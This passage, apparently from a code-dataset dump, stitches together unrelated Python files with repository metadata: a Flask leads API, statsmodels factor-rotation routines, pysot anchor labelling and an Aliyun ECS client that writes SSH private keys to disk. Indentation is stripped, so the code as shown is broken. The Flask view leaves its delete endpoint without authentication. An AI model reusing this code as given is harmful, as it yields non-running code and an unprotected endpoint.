cn = s[i + 1]
if cn == '/':
inCommentSingle = True
t.append(s[fromIndex:i])
i += 1
elif cn == '*':
inCommentMulti = True
t.append(s[fromIndex:i])
i += 1
elif inCommentSingle and (c == '\n' or c == '\r'):
inCommentSingle = False
fromIndex = i
elif inCommentMulti and c == '*' and i + 1 < l and s[i + 1] == '/':
inCommentMulti = False
i += 1
fromIndex = i + 1
i += 1
if not inCommentSingle and not inCommentMulti:
t.append(s[fromIndex:len(s)])
return "".join(t)
common_prefix = os.getcwd()+'\\'
p_list = []
for path, dirs, files in os.walk(os.getcwd()):
for file in files :
if '.object' in file:
t_file = open(os.path.join(path,file))
t_string = t_file.read()
t_json = json.loads(removecomments(t_string))
if 'description' in t_json:
t_desc = t_json['description']
else:
t_desc = "__no description__"
p_list.append(dict(path = os.path.relpath(path,common_prefix),file = file, name = t_json['shortdescription'], desc = t_desc))
t_file.close()
t_file = open(os.path.join(common_prefix,'namedump.json'),'w')
json.dump(p_list,t_file,indent = 2, sort_keys = True)
t_file.close()
| 27.869048
| 138
| 0.442546
|
667819357e155c51c422b1eb0fb2798563256a7b
| 1,643
|
py
|
Python
|
app/views/leads_view.py
|
dio-silvestre/ComunicaDev-Flask-Restful
|
c2a4c84f47305af13bbe60df588b1bca0eacb22f
|
[
"MIT"
] | null | null | null |
app/views/leads_view.py
|
dio-silvestre/ComunicaDev-Flask-Restful
|
c2a4c84f47305af13bbe60df588b1bca0eacb22f
|
[
"MIT"
] | null | null | null |
app/views/leads_view.py
|
dio-silvestre/ComunicaDev-Flask-Restful
|
c2a4c84f47305af13bbe60df588b1bca0eacb22f
|
[
"MIT"
] | null | null | null |
from http import HTTPStatus
from app.exc import DataAlreadyRegistered, DataNotFound, InvalidEmailError
from flask_restful import Resource
from flask import make_response
from flask_jwt_extended import jwt_required
from app.services.leads_service import LeadService
from app.configs.decorators import verify_role_admin
class LeadResource(Resource):
@jwt_required()
@verify_role_admin
def get(self):
return make_response(LeadService.get_all())
def post(self):
try:
return make_response(LeadService.create())
except InvalidEmailError as e:
return {'error': e.message}, HTTPStatus.BAD_REQUEST
except DataAlreadyRegistered as e:
return {'error': e.message}, HTTPStatus.CONFLICT
class LeadRetrieveResource(Resource):
@jwt_required()
@verify_role_admin
def get(self, lead_id):
try:
return make_response(LeadService.get_by_id(lead_id))
except DataNotFound as e:
return e.message, HTTPStatus.NOT_FOUND
@jwt_required()
@verify_role_admin
def patch(self, lead_id):
try:
return make_response(LeadService.update(lead_id))
except DataNotFound as e:
return e.message, HTTPStatus.NOT_FOUND
def delete(self, lead_id):
try:
return make_response(LeadService.delete(lead_id))
except DataNotFound as e:
return e.message, HTTPStatus.NOT_FOUND
class LeadSendEmailResource(Resource):
@jwt_required()
@verify_role_admin
def post(self):
return make_response(LeadService.newsletter_info())
| 26.934426
| 74
| 0.690201
|
a476fe484deaa623b0f99d63403e69756464eaa4
| 18,658
|
py
|
Python
|
statsmodels/multivariate/factor_rotation/_gpa_rotation.py
|
luxiform/statsmodels
|
916856b3ae555ead658daec31fb5130f1bbf77d5
|
[
"BSD-3-Clause"
] | 1
|
2019-12-16T10:12:31.000Z
|
2019-12-16T10:12:31.000Z
|
statsmodels/multivariate/factor_rotation/_gpa_rotation.py
|
sscswapnil/statsmodels
|
89fa4e3b685d160f94c4d99e655029c519115b17
|
[
"BSD-3-Clause"
] | null | null | null |
statsmodels/multivariate/factor_rotation/_gpa_rotation.py
|
sscswapnil/statsmodels
|
89fa4e3b685d160f94c4d99e655029c519115b17
|
[
"BSD-3-Clause"
] | 1
|
2022-01-31T11:43:28.000Z
|
2022-01-31T11:43:28.000Z
|
# -*- coding: utf-8 -*-
"""
This file contains a Python version of the gradient projection rotation
algorithms (GPA) developed by Bernaards, C.A. and Jennrich, R.I.
The code is based on code developed Bernaards, C.A. and Jennrich, R.I.
and is ported and made available with permission of the authors.
References
----------
[1] Bernaards, C.A. and Jennrich, R.I. (2005) Gradient Projection Algorithms
and Software for Arbitrary Rotation Criteria in Factor Analysis. Educational
and Psychological Measurement, 65 (5), 676-696.
[2] Jennrich, R.I. (2001). A simple general procedure for orthogonal rotation.
Psychometrika, 66, 289-306.
[3] Jennrich, R.I. (2002). A simple general method for oblique rotation.
Psychometrika, 67, 7-19.
[4] http://www.stat.ucla.edu/research/gpa/matlab.net
[5] http://www.stat.ucla.edu/research/gpa/GPderfree.txt
"""
import numpy as np
def GPA(A, ff=None, vgQ=None, T=None, max_tries=501,
rotation_method='orthogonal', tol=1e-5):
r"""
The gradient projection algorithm (GPA) minimizes a target function
:math:`\phi(L)`, where :math:`L` is a matrix with rotated factors.
For orthogonal rotation methods :math:`L=AT`, where :math:`T` is an
orthogonal matrix. For oblique rotation matrices :math:`L=A(T^*)^{-1}`,
where :math:`T` is a normal matrix, i.e., :math:`TT^*=T^*T`. Oblique
rotations relax the orthogonality constraint in order to gain simplicity
in the interpretation.
Parameters
----------
A : numpy matrix
non rotated factors
T : numpy matrix (default identity matrix)
initial guess of rotation matrix
ff : function (defualt None)
criterion :math:`\phi` to optimize. Should have A, T, L as keyword
arguments
and mapping to a float. Only used (and required) if vgQ is not
provided.
vgQ : function (defualt None)
criterion :math:`\phi` to optimize and its derivative. Should have
A, T, L as keyword arguments and mapping to a tuple containing a
float and vector. Can be omitted if ff is provided.
max_tries : int (default 501)
maximum number of iterations
rotation_method : str
should be one of {orthogonal, oblique}
tol : float
stop criterion, algorithm stops if Frobenius norm of gradient is
smaller then tol
"""
# pre processing
if rotation_method not in ['orthogonal', 'oblique']:
raise ValueError('rotation_method should be one of '
'{orthogonal, oblique}')
if vgQ is None:
if ff is None:
raise ValueError('ff should be provided if vgQ is not')
derivative_free = True
Gff = lambda x: Gf(x, lambda y: ff(T=y, A=A, L=None))
else:
derivative_free = False
if T is None:
T = np.eye(A.shape[1])
# pre processing for iteration
al = 1
table = []
# pre processing for iteration: initialize f and G
if derivative_free:
f = ff(T=T, A=A, L=None)
G = Gff(T)
elif rotation_method == 'orthogonal': # and not derivative_free
L = A.dot(T)
f, Gq = vgQ(L=L)
G = (A.T).dot(Gq)
else: # i.e. rotation_method == 'oblique' and not derivative_free
Ti = np.linalg.inv(T)
L = A.dot(Ti.T)
f, Gq = vgQ(L=L)
G = -((L.T).dot(Gq).dot(Ti)).T
# iteration
for i_try in range(0, max_tries):
# determine Gp
if rotation_method == 'orthogonal':
M = (T.T).dot(G)
S = (M + M.T)/2
Gp = G - T.dot(S)
else: # i.e. if rotation_method == 'oblique':
Gp = G-T.dot(np.diag(np.sum(T*G, axis=0)))
s = np.linalg.norm(Gp, 'fro')
table.append([i_try, f, np.log10(s), al])
# if we are close stop
if s < tol:
break
# update T
al = 2*al
for i in range(11):
# determine Tt
X = T - al*Gp
if rotation_method == 'orthogonal':
U, D, V = np.linalg.svd(X, full_matrices=False)
Tt = U.dot(V)
else: # i.e. if rotation_method == 'oblique':
v = 1/np.sqrt(np.sum(X**2, axis=0))
Tt = X.dot(np.diag(v))
# calculate objective using Tt
if derivative_free:
ft = ff(T=Tt, A=A, L=None)
elif rotation_method == 'orthogonal': # and not derivative_free
L = A.dot(Tt)
ft, Gq = vgQ(L=L)
else: # i.e. rotation_method == 'oblique' and not derivative_free
Ti = np.linalg.inv(Tt)
L = A.dot(Ti.T)
ft, Gq = vgQ(L=L)
# if sufficient improvement in objective -> use this T
if ft < f-.5*s**2*al:
break
al = al/2
# post processing for next iteration
T = Tt
f = ft
if derivative_free:
G = Gff(T)
elif rotation_method == 'orthogonal': # and not derivative_free
G = (A.T).dot(Gq)
else: # i.e. rotation_method == 'oblique' and not derivative_free
G = -((L.T).dot(Gq).dot(Ti)).T
# post processing
Th = T
Lh = rotateA(A, T, rotation_method=rotation_method)
Phi = (T.T).dot(T)
return Lh, Phi, Th, table
def Gf(T, ff):
"""
Subroutine for the gradient of f using numerical derivatives.
"""
k = T.shape[0]
ep = 1e-4
G = np.zeros((k, k))
for r in range(k):
for s in range(k):
dT = np.zeros((k, k))
dT[r, s] = ep
G[r, s] = (ff(T+dT)-ff(T-dT))/(2*ep)
return G
def rotateA(A, T, rotation_method='orthogonal'):
r"""
For orthogonal rotation methods :math:`L=AT`, where :math:`T` is an
orthogonal matrix. For oblique rotation matrices :math:`L=A(T^*)^{-1}`,
where :math:`T` is a normal matrix, i.e., :math:`TT^*=T^*T`. Oblique
rotations relax the orthogonality constraint in order to gain simplicity
in the interpretation.
"""
if rotation_method == 'orthogonal':
L = A.dot(T)
elif rotation_method == 'oblique':
L = A.dot(np.linalg.inv(T.T))
else: # i.e. if rotation_method == 'oblique':
raise ValueError('rotation_method should be one of '
'{orthogonal, oblique}')
return L
def oblimin_objective(L=None, A=None, T=None, gamma=0,
rotation_method='orthogonal',
return_gradient=True):
r"""
Objective function for the oblimin family for orthogonal or
oblique rotation wich minimizes:
.. math::
\phi(L) = \frac{1}{4}(L\circ L,(I-\gamma C)(L\circ L)N),
where :math:`L` is a :math:`p\times k` matrix, :math:`N` is
:math:`k\times k`
matrix with zeros on the diagonal and ones elsewhere, :math:`C` is a
:math:`p\times p` matrix with elements equal to :math:`1/p`,
:math:`(X,Y)=\operatorname{Tr}(X^*Y)` is the Frobenius norm and
:math:`\circ`
is the element-wise product or Hadamard product.
The gradient is given by
.. math::
L\circ\left[(I-\gamma C) (L \circ L)N\right].
Either :math:`L` should be provided or :math:`A` and :math:`T` should be
provided.
For orthogonal rotations :math:`L` satisfies
.. math::
L = AT,
where :math:`T` is an orthogonal matrix. For oblique rotations :math:`L`
satisfies
.. math::
L = A(T^*)^{-1},
where :math:`T` is a normal matrix.
The oblimin family is parameterized by the parameter :math:`\gamma`. For
orthogonal rotations:
* :math:`\gamma=0` corresponds to quartimax,
* :math:`\gamma=\frac{1}{2}` corresponds to biquartimax,
* :math:`\gamma=1` corresponds to varimax,
* :math:`\gamma=\frac{1}{p}` corresponds to equamax.
For oblique rotations rotations:
* :math:`\gamma=0` corresponds to quartimin,
* :math:`\gamma=\frac{1}{2}` corresponds to biquartimin.
Parameters
----------
L : numpy matrix (default None)
rotated factors, i.e., :math:`L=A(T^*)^{-1}=AT`
A : numpy matrix (default None)
non rotated factors
T : numpy matrix (default None)
rotation matrix
gamma : float (default 0)
a parameter
rotation_method : str
should be one of {orthogonal, oblique}
return_gradient : bool (default True)
toggles return of gradient
"""
if L is None:
assert(A is not None and T is not None)
L = rotateA(A, T, rotation_method=rotation_method)
p, k = L.shape
L2 = L**2
N = np.ones((k, k))-np.eye(k)
if np.isclose(gamma, 0):
X = L2.dot(N)
else:
C = np.ones((p, p))/p
X = (np.eye(p) - gamma*C).dot(L2).dot(N)
phi = np.sum(L2*X)/4
if return_gradient:
Gphi = L*X
return phi, Gphi
else:
return phi
def orthomax_objective(L=None, A=None, T=None, gamma=0, return_gradient=True):
r"""
Objective function for the orthomax family for orthogonal
rotation wich minimizes the following objective:
.. math::
\phi(L) = -\frac{1}{4}(L\circ L,(I-\gamma C)(L\circ L)),
where :math:`0\leq\gamma\leq1`, :math:`L` is a :math:`p\times k` matrix,
:math:`C` is a :math:`p\times p` matrix with elements equal to
:math:`1/p`,
:math:`(X,Y)=\operatorname{Tr}(X^*Y)` is the Frobenius norm and
:math:`\circ` is the element-wise product or Hadamard product.
Either :math:`L` should be provided or :math:`A` and :math:`T` should be
provided.
For orthogonal rotations :math:`L` satisfies
.. math::
L = AT,
where :math:`T` is an orthogonal matrix.
The orthomax family is parameterized by the parameter :math:`\gamma`:
* :math:`\gamma=0` corresponds to quartimax,
* :math:`\gamma=\frac{1}{2}` corresponds to biquartimax,
* :math:`\gamma=1` corresponds to varimax,
* :math:`\gamma=\frac{1}{p}` corresponds to equamax.
Parameters
----------
L : numpy matrix (default None)
rotated factors, i.e., :math:`L=A(T^*)^{-1}=AT`
A : numpy matrix (default None)
non rotated factors
T : numpy matrix (default None)
rotation matrix
gamma : float (default 0)
a parameter
return_gradient : bool (default True)
toggles return of gradient
"""
assert 0 <= gamma <= 1, "Gamma should be between 0 and 1"
if L is None:
assert(A is not None and T is not None)
L = rotateA(A, T, rotation_method='orthogonal')
p, k = L.shape
L2 = L**2
if np.isclose(gamma, 0):
X = L2
else:
C = np.ones((p, p))/p
X = (np.eye(p)-gamma*C).dot(L2)
phi = -np.sum(L2*X)/4
if return_gradient:
Gphi = -L*X
return phi, Gphi
else:
return phi
def CF_objective(L=None, A=None, T=None, kappa=0,
rotation_method='orthogonal',
return_gradient=True):
r"""
Objective function for the Crawford-Ferguson family for orthogonal
and oblique rotation wich minimizes the following objective:
.. math::
\phi(L) =\frac{1-\kappa}{4} (L\circ L,(L\circ L)N)
-\frac{1}{4}(L\circ L,M(L\circ L)),
where :math:`0\leq\kappa\leq1`, :math:`L` is a :math:`p\times k` matrix,
:math:`N` is :math:`k\times k` matrix with zeros on the diagonal and ones
elsewhere,
:math:`M` is :math:`p\times p` matrix with zeros on the diagonal and ones
elsewhere
:math:`(X,Y)=\operatorname{Tr}(X^*Y)` is the Frobenius norm and
:math:`\circ` is the element-wise product or Hadamard product.
The gradient is given by
.. math::
d\phi(L) = (1-\kappa) L\circ\left[(L\circ L)N\right]
-\kappa L\circ \left[M(L\circ L)\right].
Either :math:`L` should be provided or :math:`A` and :math:`T` should be
provided.
For orthogonal rotations :math:`L` satisfies
.. math::
L = AT,
where :math:`T` is an orthogonal matrix. For oblique rotations :math:`L`
satisfies
.. math::
L = A(T^*)^{-1},
where :math:`T` is a normal matrix.
For orthogonal rotations the oblimin (and orthomax) family of rotations is
equivalent to the Crawford-Ferguson family. To be more precise:
* :math:`\kappa=0` corresponds to quartimax,
* :math:`\kappa=\frac{1}{p}` corresponds to variamx,
* :math:`\kappa=\frac{k-1}{p+k-2}` corresponds to parsimax,
* :math:`\kappa=1` corresponds to factor parsimony.
Parameters
----------
L : numpy matrix (default None)
rotated factors, i.e., :math:`L=A(T^*)^{-1}=AT`
A : numpy matrix (default None)
non rotated factors
T : numpy matrix (default None)
rotation matrix
gamma : float (default 0)
a parameter
rotation_method : str
should be one of {orthogonal, oblique}
return_gradient : bool (default True)
toggles return of gradient
"""
assert 0 <= kappa <= 1, "Kappa should be between 0 and 1"
if L is None:
assert(A is not None and T is not None)
L = rotateA(A, T, rotation_method=rotation_method)
p, k = L.shape
L2 = L**2
X = None
if not np.isclose(kappa, 1):
N = np.ones((k, k)) - np.eye(k)
X = (1 - kappa)*L2.dot(N)
if not np.isclose(kappa, 0):
M = np.ones((p, p)) - np.eye(p)
if X is None:
X = kappa*M.dot(L2)
else:
X += kappa*M.dot(L2)
phi = np.sum(L2 * X) / 4
if return_gradient:
Gphi = L*X
return phi, Gphi
else:
return phi
def vgQ_target(H, L=None, A=None, T=None, rotation_method='orthogonal'):
r"""
Subroutine for the value of vgQ using orthogonal or oblique rotation
towards a target matrix, i.e., we minimize:
.. math::
\phi(L) =\frac{1}{2}\|L-H\|^2
and the gradient is given by
.. math::
d\phi(L)=L-H.
Either :math:`L` should be provided or :math:`A` and :math:`T` should be
provided.
For orthogonal rotations :math:`L` satisfies
.. math::
L = AT,
where :math:`T` is an orthogonal matrix. For oblique rotations :math:`L`
satisfies
.. math::
L = A(T^*)^{-1},
where :math:`T` is a normal matrix.
Parameters
----------
H : numpy matrix
target matrix
L : numpy matrix (default None)
rotated factors, i.e., :math:`L=A(T^*)^{-1}=AT`
A : numpy matrix (default None)
non rotated factors
T : numpy matrix (default None)
rotation matrix
rotation_method : str
should be one of {orthogonal, oblique}
"""
if L is None:
assert(A is not None and T is not None)
L = rotateA(A, T, rotation_method=rotation_method)
q = np.linalg.norm(L-H, 'fro')**2
Gq = 2*(L-H)
return q, Gq
def ff_target(H, L=None, A=None, T=None, rotation_method='orthogonal'):
r"""
Subroutine for the value of f using (orthogonal or oblique) rotation
towards a target matrix, i.e., we minimize:
.. math::
\phi(L) =\frac{1}{2}\|L-H\|^2.
Either :math:`L` should be provided or :math:`A` and :math:`T` should be
provided. For orthogonal rotations :math:`L` satisfies
.. math::
L = AT,
where :math:`T` is an orthogonal matrix. For oblique rotations
:math:`L` satisfies
.. math::
L = A(T^*)^{-1},
where :math:`T` is a normal matrix.
Parameters
----------
H : numpy matrix
target matrix
L : numpy matrix (default None)
rotated factors, i.e., :math:`L=A(T^*)^{-1}=AT`
A : numpy matrix (default None)
non rotated factors
T : numpy matrix (default None)
rotation matrix
rotation_method : str
should be one of {orthogonal, oblique}
"""
if L is None:
assert(A is not None and T is not None)
L = rotateA(A, T, rotation_method=rotation_method)
return np.linalg.norm(L-H, 'fro')**2
def vgQ_partial_target(H, W=None, L=None, A=None, T=None):
r"""
Subroutine for the value of vgQ using orthogonal rotation towards a partial
target matrix, i.e., we minimize:
.. math::
\phi(L) =\frac{1}{2}\|W\circ(L-H)\|^2,
where :math:`\circ` is the element-wise product or Hadamard product and
:math:`W` is a matrix whose entries can only be one or zero. The gradient
is given by
.. math::
d\phi(L)=W\circ(L-H).
Either :math:`L` should be provided or :math:`A` and :math:`T` should be
provided.
For orthogonal rotations :math:`L` satisfies
.. math::
L = AT,
where :math:`T` is an orthogonal matrix.
Parameters
----------
H : numpy matrix
target matrix
W : numpy matrix (default matrix with equal weight one for all entries)
matrix with weights, entries can either be one or zero
L : numpy matrix (default None)
rotated factors, i.e., :math:`L=A(T^*)^{-1}=AT`
A : numpy matrix (default None)
non rotated factors
T : numpy matrix (default None)
rotation matrix
"""
if W is None:
return vgQ_target(H, L=L, A=A, T=T)
if L is None:
assert(A is not None and T is not None)
L = rotateA(A, T, rotation_method='orthogonal')
q = np.linalg.norm(W*(L-H), 'fro')**2
Gq = 2*W*(L-H)
return q, Gq
def ff_partial_target(H, W=None, L=None, A=None, T=None):
r"""
Subroutine for the value of vgQ using orthogonal rotation towards a partial
target matrix, i.e., we minimize:
.. math::
\phi(L) =\frac{1}{2}\|W\circ(L-H)\|^2,
where :math:`\circ` is the element-wise product or Hadamard product and
:math:`W` is a matrix whose entries can only be one or zero. Either
:math:`L` should be provided or :math:`A` and :math:`T` should be provided.
For orthogonal rotations :math:`L` satisfies
.. math::
L = AT,
where :math:`T` is an orthogonal matrix.
Parameters
----------
H : numpy matrix
target matrix
W : numpy matrix (default matrix with equal weight one for all entries)
matrix with weights, entries can either be one or zero
L : numpy matrix (default None)
rotated factors, i.e., :math:`L=A(T^*)^{-1}=AT`
A : numpy matrix (default None)
non rotated factors
T : numpy matrix (default None)
rotation matrix
"""
if W is None:
return ff_target(H, L=L, A=A, T=T)
if L is None:
assert(A is not None and T is not None)
L = rotateA(A, T, rotation_method='orthogonal')
q = np.linalg.norm(W*(L-H), 'fro')**2
return q
| 31.410774
| 79
| 0.582806
|
fe14cd3e059203ce9b86cc080a843f0643fbc57c
| 133
|
py
|
Python
|
data/gr-boundary-golf.py
|
cheeseywhiz/cheeseywhiz
|
51f6651ddbaeebd14d9ce77776bc4cf3a95511c4
|
[
"MIT"
] | null | null | null |
data/gr-boundary-golf.py
|
cheeseywhiz/cheeseywhiz
|
51f6651ddbaeebd14d9ce77776bc4cf3a95511c4
|
[
"MIT"
] | null | null | null |
data/gr-boundary-golf.py
|
cheeseywhiz/cheeseywhiz
|
51f6651ddbaeebd14d9ce77776bc4cf3a95511c4
|
[
"MIT"
] | null | null | null |
import json,matplotlib.pyplot as p;p.plot(*zip(*json.loads(open('f').read())['features'][0]['geometry']['coordinates'][0]));p.show()
| 66.5
| 132
| 0.669173
|
aff885221137789a6ffac105f98648f256432613
| 4,223
|
py
|
Python
|
pysot/datasets/anchor_target.py
|
Existever/Pysot
|
41f009904c81422ae71e83aab5655631d5c4b0d8
|
[
"Apache-2.0",
"MIT"
] | 1
|
2020-08-14T14:57:57.000Z
|
2020-08-14T14:57:57.000Z
|
pysot/datasets/anchor_target.py
|
Existever/Pysot
|
41f009904c81422ae71e83aab5655631d5c4b0d8
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
pysot/datasets/anchor_target.py
|
Existever/Pysot
|
41f009904c81422ae71e83aab5655631d5c4b0d8
|
[
"Apache-2.0",
"MIT"
] | 1
|
2019-11-26T11:48:40.000Z
|
2019-11-26T11:48:40.000Z
|
# Copyright (c) SenseTime. All Rights Reserved.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
from pysot.core.config import cfg
from pysot.utils.bbox import IoU, corner2center
from pysot.utils.anchor import Anchors
class AnchorTarget:
def __init__(self,):
#按照给定的比例因子生成一个位置的多种anchor,输出shape为【anchor_num,4】其中输出的anchor的值为[-w * 0.5, -h * 0.5, w * 0.5, h * 0.5]
self.anchors = Anchors(cfg.ANCHOR.STRIDE, #8
cfg.ANCHOR.RATIOS, # [0.33, 0.5, 1, 2, 3]
cfg.ANCHOR.SCALES)
# 生成两种类型的anchor,第一种是左上右下坐标类型的,第二种是中心点类型的,shape均为【4,anchor_num,size,size]
self.anchors.generate_all_anchors(im_c=cfg.TRAIN.SEARCH_SIZE//2,
size=cfg.TRAIN.OUTPUT_SIZE)
def __call__(self, target, size, neg=False):
'''
:param target:搜索区域坐标系下对应目标区域的bbox
:param size:输出相关面特征图的大小
:param neg:本次是否进行的是负样本对的训练
:return: 对应到特征图上每个anchor的信息:cls(此anchor是正样本:1、负样本:0、忽略:-1), delta(正样本框相对于anchor的编码偏移量), delta_weight(正样本对应的那些anchor的权重,其他位置为0), overlap(正样本和所有anchor的IOU)
'''
anchor_num = len(cfg.ANCHOR.RATIOS) * len(cfg.ANCHOR.SCALES)
# -1 ignore 0 negative 1 positive (anchor标签信息,-1表示忽略,0表示负样本,1表示正样本)
cls = -1 * np.ones((anchor_num, size, size), dtype=np.int64)
delta = np.zeros((4, anchor_num, size, size), dtype=np.float32)
delta_weight = np.zeros((anchor_num, size, size), dtype=np.float32)
def select(position, keep_num=16): #根据满足条件的位置模板,保留keep_num个有效的anchor(只做随机的选择,有点太简单了,至少按iou的高低来选择)
num = position[0].shape[0]
if num <= keep_num:
return position, num
slt = np.arange(num)
np.random.shuffle(slt)
slt = slt[:keep_num]
return tuple(p[slt] for p in position), keep_num
tcx, tcy, tw, th = corner2center(target)
if neg: #如果本轮训练的是负样本对,则认为在特征图上目标中心附近7*7的区域内的anchor都是负样本
# l = size // 2 - 3
# r = size // 2 + 3 + 1
# cls[:, l:r, l:r] = 0
cx = size // 2
cy = size // 2
cx += int(np.ceil((tcx - cfg.TRAIN.SEARCH_SIZE // 2) /
cfg.ANCHOR.STRIDE + 0.5))
cy += int(np.ceil((tcy - cfg.TRAIN.SEARCH_SIZE // 2) /
cfg.ANCHOR.STRIDE + 0.5))
l = max(0, cx - 3) #目标中心附近7*7的区域
r = min(size, cx + 4)
u = max(0, cy - 3)
d = min(size, cy + 4)
cls[:, u:d, l:r] = 0
neg, neg_num = select(np.where(cls == 0), cfg.TRAIN.NEG_NUM)
cls[:] = -1
cls[neg] = 0
overlap = np.zeros((anchor_num, size, size), dtype=np.float32)
return cls, delta, delta_weight, overlap
anchor_box = self.anchors.all_anchors[0] #all_anchors中已经提前为特征图的每个位置生成多种anchor的信息了。shape为【anchor_num,size,size】
anchor_center = self.anchors.all_anchors[1]
x1, y1, x2, y2 = anchor_box[0], anchor_box[1], \
anchor_box[2], anchor_box[3]
cx, cy, w, h = anchor_center[0], anchor_center[1], \
anchor_center[2], anchor_center[3]
delta[0] = (tcx - cx) / w #tcx,tcy表示的是目标的相关信息,而tx,ty表示的是anchor的相关信息,这里将位置信息编码为相对与anchor的偏移量或者比例使得网络更容易预测
delta[1] = (tcy - cy) / h
delta[2] = np.log(tw / w)
delta[3] = np.log(th / h)
overlap = IoU([x1, y1, x2, y2], target) #计算这一个target和所有anchor的iou,
pos = np.where(overlap > cfg.TRAIN.THR_HIGH) #如果iou大于设定阈值(0.6),则认为是正样本
neg = np.where(overlap < cfg.TRAIN.THR_LOW) #如果iou小于设定阈值(0.3),则认为是负样本
pos, pos_num = select(pos, cfg.TRAIN.POS_NUM)
neg, neg_num = select(neg, cfg.TRAIN.TOTAL_NUM - cfg.TRAIN.POS_NUM)
cls[pos] = 1 #正样本位置设置为1,
delta_weight[pos] = 1. / (pos_num + 1e-6) #对正样本位置加权,方便计算loss时候对正样本位置取平均,其他位置 忽略
cls[neg] = 0 #负样本设置为0,其他位置为初始值-1
return cls, delta, delta_weight, overlap
| 42.656566
| 161
| 0.574473
|
8b28789975fb65cdc4570c39689b414b8731db83
| 11,644
|
py
|
Python
|
pymlsql/aliyun/ecs_builder.py
|
allwefantasy/PyMLSQL
|
9d7a6aa2df42fd7a384885f1423c34ae5baff925
|
[
"Apache-2.0"
] | null | null | null |
pymlsql/aliyun/ecs_builder.py
|
allwefantasy/PyMLSQL
|
9d7a6aa2df42fd7a384885f1423c34ae5baff925
|
[
"Apache-2.0"
] | null | null | null |
pymlsql/aliyun/ecs_builder.py
|
allwefantasy/PyMLSQL
|
9d7a6aa2df42fd7a384885f1423c34ae5baff925
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import json
import logging
import time
import pymlsql.aliyun.shellutils as shellutils
from aliyunsdkcore.client import AcsClient
from aliyunsdkecs.request.v20140526.AllocatePublicIpAddressRequest import AllocatePublicIpAddressRequest
from aliyunsdkecs.request.v20140526.CreateInstanceRequest import CreateInstanceRequest
from aliyunsdkecs.request.v20140526.DeleteInstanceRequest import DeleteInstanceRequest
from aliyunsdkecs.request.v20140526.DescribeInstancesRequest import DescribeInstancesRequest
from aliyunsdkecs.request.v20140526.CreateKeyPairRequest import CreateKeyPairRequest
from aliyunsdkecs.request.v20140526.DeleteKeyPairsRequest import DeleteKeyPairsRequest
from aliyunsdkecs.request.v20140526.StartInstanceRequest import StartInstanceRequest
from aliyunsdkecs.request.v20140526.StopInstanceRequest import StopInstanceRequest
ALIYUN_AK = "AK"
ALIYUN_AKS = "AKS"
ALIYUN_REGION = "cn-hangzhou"
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("ECSClient")
ECS_STATUS_PENDING = "Pending"
ECS_STATUS_RUNNING = "Running"
ECS_STATUS_STOPPED = "Stopped"
ECS_STATUS_STARTING = "Starting"
ECS_STATUS_STOPPING = "Stopping"
class ECSClientBuilder(object):
def __init__(self):
self.request = CreateInstanceRequest()
self.keyPairName = None
def instance_type(self, value):
self.request.set_InstanceType(value)
return self
def image_id(self, value):
self.request.set_ImageId(value)
return self
def security_group(self, value):
self.request.set_SecurityGroupId(value)
return self
def key_pair_name(self, value):
self.request.set_KeyPairName(value)
self.keyPairName = value
return self
def internet_max_bandwidth_out(self, value):
self.request.set_InternetMaxBandwidthOut(value)
return self
def build(self):
if not self.keyPairName:
raise ValueError("key_pair_name should be set")
client = ECSClient(self.keyPairName, create_instance_request=self.request)
return client
class ECSClient(object):
def __init__(self, keyPairName, create_instance_request=None):
if not ECSClient.env(ALIYUN_AK) or not ECSClient.env(ALIYUN_AKS):
raise ValueError("AK or AKS should be configured by environment")
self.client = AcsClient(
ECSClient.env(ALIYUN_AK),
ECSClient.env(ALIYUN_AKS),
ALIYUN_REGION
)
self.create_instance_request = create_instance_request
self.keyPairName = keyPairName
@staticmethod
def env(name):
return os.environ[name]
@staticmethod
def home():
# return shellutils.run_cmd(["eval", "echo", "~$USER"], True)
from os.path import expanduser
return expanduser("~")
# return "/Users/allwefantasy"
# from pathlib import Path
# return str(Path.home())
# We should create sshkey first then create instance
def create_sshkey(self, save_path):
request = CreateKeyPairRequest()
request.set_KeyPairName(self.keyPairName)
response = self.execute(request)
# write private key to ./ssh directory
with open(save_path + "/" + self.keyPairName, "w") as f:
f.write(response['PrivateKeyBody'])
# append fingerprint to known_hosts
# with open(save_path + "/tmp_knowhost_" + self.keyPairName, "w") as f:
# f.write(response['KeyPairFingerPrint'])
return response
# We should create sshkey first then create instance
def add_finterprint(self, save_path, ip):
pass
# with open(save_path + "/tmp_knowhost_" + self.keyPairName, 'r') as f:
# content = "\n".join(f.readlines())
# with open(save_path + "/known_hosts", "a") as f:
# f.write(ip + " ecdsa-sha2-nistp256 " + content)
def delete_sshkey(self):
request = DeleteKeyPairsRequest()
request.set_KeyPairNames([self.keyPairName])
response = self.execute(request)
return response
def create_after_pay_instance(self, internet_max_bandwidth_out=1, image_id="m-bp19ibpdra8vdltxftbc",
instance_type="ecs.ic5.large"):
if self.create_instance_request:
logger.info("using create request from Builder")
request = self.create_instance_request
else:
request = CreateInstanceRequest()
request.set_ImageId(image_id)
request.set_InstanceType(instance_type)
request.set_IoOptimized('optimized')
request.set_SystemDiskCategory('cloud_ssd')
request.set_KeyPairName(self.keyPairName)
if internet_max_bandwidth_out > 0:
request.set_InternetMaxBandwidthOut(internet_max_bandwidth_out)
response = self.execute(request)
logger.info(response)
instance_id = response.get('InstanceId')
logger.info("instance %s created task submit successfully.", instance_id)
return instance_id
def allocate_public_address(self, instance_id):
status = self.get_instance_status_by_id(instance_id)
if status != ECS_STATUS_STOPPED and status != ECS_STATUS_RUNNING:
logger.warning("instance [%s] is not in [%s],current status [%s], cannot allocate_public_address",
instance_id,
",".join([ECS_STATUS_STOPPED, ECS_STATUS_RUNNING]), status)
return None
request = AllocatePublicIpAddressRequest()
request.set_InstanceId(instance_id)
response = self.execute(request)
logger.info("allocate address [%s] for [%s],", response["IpAddress"], instance_id)
return response["IpAddress"]
def get_instance_detail_by_id(self, instance_id):
request = DescribeInstancesRequest()
request.set_InstanceIds(json.dumps([instance_id]))
response = self.execute(request)
return response.get('Instances').get('Instance')
def get_instance_status_by_id(self, instance_id):
return self.get_instance_detail_by_id(instance_id)[0]["Status"]
def check_instance_exists_by_id(self, instance_id):
return len(self.get_instance_detail_by_id(instance_id)) > 0
def start_instance(self, instance_id):
status = self.get_instance_status_by_id(instance_id)
